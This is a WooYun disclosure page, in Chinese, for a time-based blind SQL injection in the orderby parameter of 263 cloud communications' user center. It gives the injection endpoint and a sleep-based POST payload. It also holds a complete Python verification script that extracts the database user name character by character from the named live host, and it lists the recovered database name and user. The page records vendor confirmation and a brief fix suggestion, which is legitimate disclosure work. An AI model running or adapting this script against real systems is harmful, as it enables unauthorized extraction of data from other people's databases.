当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169806

漏洞标题:263云通信某处SQL注入(order by注入/附验证脚本)

相关厂商:263通信

漏洞作者: 男丶壹号

提交时间:2016-01-14 12:02

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

263云通信某处SQL注入(order by注入/附验证脚本)

详细说明:

站点:http://uc.263.net/
云通信个人中心

0.jpg


注入点:

http://uc.263.net/ma/web/usc/action/bill/list/recharge.do?sid=uid_pc_100000000405&_t=1452739998706


post如下数据,5秒后返回结果,证明有注入(注入参数:orderby):

{"pageInfo":{"pageNo":1,"pageSize":50,"totalCount":1,"totalPageNum":1},"startTime":1450022400000,"endTime":1452700800000,"filter":"","sortcolumn":"processTime","orderby":"asc,sleep(5)"}


漏洞证明:

数据库:uboss
数据库用户:bossapp@192.168.200.116
验证脚本:

import time
import hashlib
import httplib
headers = {'Content-Type': 'application/json',
           'Cookie':'你的cookie'} 
payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' 
user = '' 
isEnd=False
print '[%s] Start to retrive user_name:' % time.strftime('%H:%M:%S', time.localtime())
for i in range(1,50):
    if isEnd:
        break
    isEnd=True
    for payload in payloads: 
        try:
            url='/ma/web/usc/action/bill/list/recharge.do?sid=uid_pc_100000000405'
            data='{"pageInfo":{"pageNo":1,"pageSize":50,"totalCount":1,"totalPageNum":1},"startTime":1452700800000,"endTime":1452700800000,"filter":"","sortcolumn":"processTime","orderby":"asc,if(locate(\''+payload+'\',substring(user(),'+str(i)+',1)),sleep(3),1)"}';
            conn = httplib.HTTPConnection('uc.263.net', timeout=10) 
            conn.request(method='POST',url=url, headers=headers,body=data) 
            start_time = time.time()
            html_doc = conn.getresponse().read() 
            conn.close() 
            if(time.time() - start_time) > 3:
                isEnd=False
                user += payload 
                print '\n[in progress]', user, 
                break 
        except:
             print ''
        time.sleep(0.1)
print '\n[Done] user_name is %s' % user


1.jpg

修复方案:

对order by参数做特殊字符过滤。

版权声明:转载请注明来源 男丶壹号@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-14 12:40

厂商回复:

感谢,20

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-14 12:08 | 深度安全实验室 ( 核心白帽子 | Rank:2695 漏洞数:454 )

    rand(1=1) rand(1=2) 这种么